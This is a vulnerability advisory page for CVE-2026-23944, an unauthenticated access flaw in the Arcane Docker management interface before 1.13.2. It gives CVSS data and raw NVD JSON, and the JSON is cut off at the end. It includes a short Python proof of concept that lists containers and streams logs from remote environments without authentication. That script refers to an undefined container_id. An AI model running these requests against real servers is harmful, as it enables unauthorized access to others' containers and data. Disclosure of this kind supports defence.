CVE-2026-23944

Description

Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to version 1.13.2, unauthenticated requests could be proxied to remote environment agents, allowing access to remote environment resources without authentication. The environment proxy middleware handled `/api/environments/{id}/...` requests for remote environments before authentication was enforced. When the environment ID was not local, the middleware proxied the request and attached the manager-held agent token, even if the caller was unauthenticated. This enabled unauthenticated access to remote environment operations (e.g., listing containers, streaming logs, or other agent endpoints). An unauthenticated attacker could access and manipulate remote environment resources via the proxy, potentially leading to data exposure, unauthorized changes, or service disruption. Version 1.13.2 patches the vulnerability.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:arcane:arcane:*:*:*:*:*:*:*:* - VULNERABLE

Arcane < 1.13.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# CVE-2026-23944 PoC - Unauthenticated Access to Remote Environment
# Target: Arcane < 1.13.2

target = "http://target-arcane-server.com"
# Identify a remote environment ID (could be enumerated or obtained from public sources)
remote_env_id = "remote-env-uuid-12345"

# List containers in remote environment without authentication
list_containers_url = f"{target}/api/environments/{remote_env_id}/containers"
response = requests.get(list_containers_url)
print(f"Status: {response.status_code}")
print(f"Containers: {response.text}")

# Stream logs from a container in remote environment
logs_url = f"{target}/api/environments/{remote_env_id}/containers/{container_id}/logs"
logs_response = requests.get(logs_url, stream=True)
print(f"Logs Status: {logs_response.status_code}")
for line in logs_response.iter_lines():
    print(line)

# Execute other agent endpoints (images, volumes, networks)
# images: /api/environments/{id}/images
# volumes: /api/environments/{id}/volumes
# networks: /api/environments/{id}/networks

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-23944
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-23944
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-23944/
[4] VulDB https://vuldb.com/cve/CVE-2026-23944
[5] https://github.com/getarcaneapp/arcane/commit/2008e1b93b25d0c4c3fff3af07843766231614eb
[6] https://github.com/getarcaneapp/arcane/pull/1532
[7] https://github.com/getarcaneapp/arcane/releases/tag/v1.13.2
[8] https://github.com/getarcaneapp/arcane/security/advisories/GHSA-2jv8-39rp-cqqr

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-23944", "sourceIdentifier": "[email protected]", "published": "2026-01-19T22:16:02.603", "lastModified": "2026-02-02T15:19:05.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to version 1.13.2, unauthenticated requests could be proxied to remote environment agents, allowing access to remote environment resources without authentication. The environment proxy middleware handled `/api/environments/{id}/...` requests for remote environments before authentication was enforced. When the environment ID was not local, the middleware proxied the request and attached the manager-held agent token, even if the caller was unauthenticated. This enabled unauthenticated access to remote environment operations (e.g., listing containers, streaming logs, or other agent endpoints). An unauthenticated attacker could access and manipulate remote environment resources via the proxy, potentially leading to data exposure, unauthorized changes, or service disruption. Version 1.13.2 patches the vulnerability."}, {"lang": "es", "value": "Arcane es una interfaz para gestionar contenedores Docker, imágenes, redes y volúmenes. Antes de la versión 1.13.2, las solicitudes no autenticadas podían ser redirigidas a agentes de entornos remotos, permitiendo el acceso a recursos de entornos remotos sin autenticación. El middleware de proxy de entorno manejaba las solicitudes `/api/environments/{id}/...` para entornos remotos antes de que se aplicara la autenticación. Cuando el ID del entorno no era local, el middleware redirigía la solicitud y adjuntaba el token de agente en posesión del gestor, incluso si el solicitante no estaba autenticado. Esto permitía el acceso no autenticado a operaciones de entornos remotos (por ejemplo, listar contenedores, transmitir registros u otros puntos finales de agente). Un atacante no autenticado podía acceder y manipular recursos de entornos remotos a través del proxy, lo que podría llevar a la exposición de datos, cambios no autorizados o interrupción del servicio. La versión 1.13.2 corrige la vulnerabilidad."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:arcane:arcane:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.13.2", "matchCriteriaId": "3331EF16-7450-4A37-8FD0-7BE706CC82C9"}]}]}], "references": [{"url": "https://github.com/getarcaneapp/arcane/commit/2008e1b93b25d0c4c3fff3af07843766231614eb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/getarcaneapp/arcane/pull/1532", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory", "Patch"]}, {"url": "http ... (truncated)